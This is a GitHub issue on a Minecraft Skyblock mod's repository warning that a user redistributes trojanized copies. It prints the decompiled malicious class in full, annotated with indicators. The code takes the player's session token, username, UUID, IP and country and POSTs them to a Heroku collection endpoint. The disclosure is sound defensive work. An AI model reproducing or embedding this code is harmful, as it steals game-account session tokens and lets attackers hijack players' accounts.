bowser0000/SkyblockMod

Somebody is distributing copies of this mod with malware.

Closed this issue · 2 comments

A user named "HypixelMods" is distributing multiple copies of this project with malware added.
Tested with VirusTotal; this is not a false positive: I tested both the original and the version in his repos.

Here are his details:
https://www.youtube.com/channel/UCKS_hHOaH2hETdhtRCo7Tpw
https://github.com/HypixelMods

UPDATE:
I decompiled the code using DJ decompiler and found that this is the malware:

package me.Danker;

import com.google.gson.Gson;
import com.google.gson.JsonObject;
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.OutputStream;
import java.net.HttpURLConnection;
import java.net.URL;
import net.minecraft.client.Minecraft;

/**
 * Decompiled class from the trojanized copy of the mod, kept verbatim as evidence.
 *
 * <p>The class name is unrelated to what the code does: {@link #start()} builds a JSON
 * document from the running Minecraft client's session and POSTs it to a remote host.
 * The Minecraft calls are obfuscated (SRG-style) names; the JSON keys they feed are
 * "username", "uuid" and "token".
 *
 * <p>Network indicators visible in this listing, usable for log and proxy searches:
 * <ul>
 *   <li>POST to {@code http://skyblockrat.herokuapp.com/update} (plain HTTP) with
 *       {@code Content-Type: application/json} and {@code User-Agent: Java}</li>
 *   <li>GET requests to {@code https://api.myip.com/} made from the game client</li>
 * </ul>
 *
 * <p>NOTE(review): the "token" field presumably carries the session access token. Anyone
 * who ran a build containing this class should treat that session as exposed and
 * re-authenticate; confirm against the deobfuscation mappings.
 */
public class MacroSelector {
  /**
   * Collects session and network details and sends them to the remote endpoint.
   *
   * <p>Nothing in this listing shows where this method is called from.
   *
   * @throws IOException if opening the connection, writing the body or reading the
   *     response fails
   */
  public static void start() throws IOException {
    // Hard-coded collection endpoint; the scheme is http, so the body is sent unencrypted.
    URL url = new URL("http://skyblockrat.herokuapp.com/update");
    HttpURLConnection connection = (HttpURLConnection)url.openConnection();
    connection.addRequestProperty("Content-Type", "application/json");
    connection.addRequestProperty("User-Agent", "Java");
    connection.setDoOutput(true);
    connection.setRequestMethod("POST");
    // JSON assembled by string concatenation from three values read off the client's
    // session object plus the "ip" and "country" fields of the api.myip.com response.
    // api.myip.com is queried twice, once per field.
    String data = "{\"username\": \"" + Minecraft.func_71410_x().func_110432_I().func_111285_a() + "\", \"uuid\": \"" + Minecraft.func_71410_x().func_110432_I().func_148255_b() + "\", \"ip\": \"" + ((JsonObject)(new Gson()).fromJson(select(new URL("https://api.myip.com/")), JsonObject.class)).get("ip").getAsString() + "\", \"country\": \"" + ((JsonObject)(new Gson()).fromJson(select(new URL("https://api.myip.com/")), JsonObject.class)).get("country").getAsString() + "\", \"token\": \"" + Minecraft.func_71410_x().func_110432_I().func_111286_b() + "\"}";
    byte[] out = data.getBytes();
    OutputStream stream = connection.getOutputStream();
    stream.write(out);
    stream.flush();
    stream.close();
    // The response stream is opened and closed without being read.
    connection.getInputStream().close();
    connection.disconnect();
  }
  
  /**
   * Fetches the given URL and returns the response body as text.
   *
   * <p>Despite its name this is a plain HTTP GET helper; in this class it is only used
   * to query {@code https://api.myip.com/}.
   *
   * @param url the URL to read
   * @return the lines read so far, each followed by the system line separator; an empty
   *     string if nothing could be read
   */
  public static String select(URL url) {
    StringBuilder sb = new StringBuilder();
    try {
      InputStream in = url.openStream();
      try {
        BufferedReader reader = new BufferedReader(new InputStreamReader(in));
        String line;
        while ((line = reader.readLine()) != null)
          sb.append(line).append(System.lineSeparator()); 
      } finally {
        in.close();
      } 
    // Every failure is swallowed, so a failed lookup leaves no error output or log entry.
    } catch (Exception exception) {}
    return sb.toString();
  }
}

The account got deleted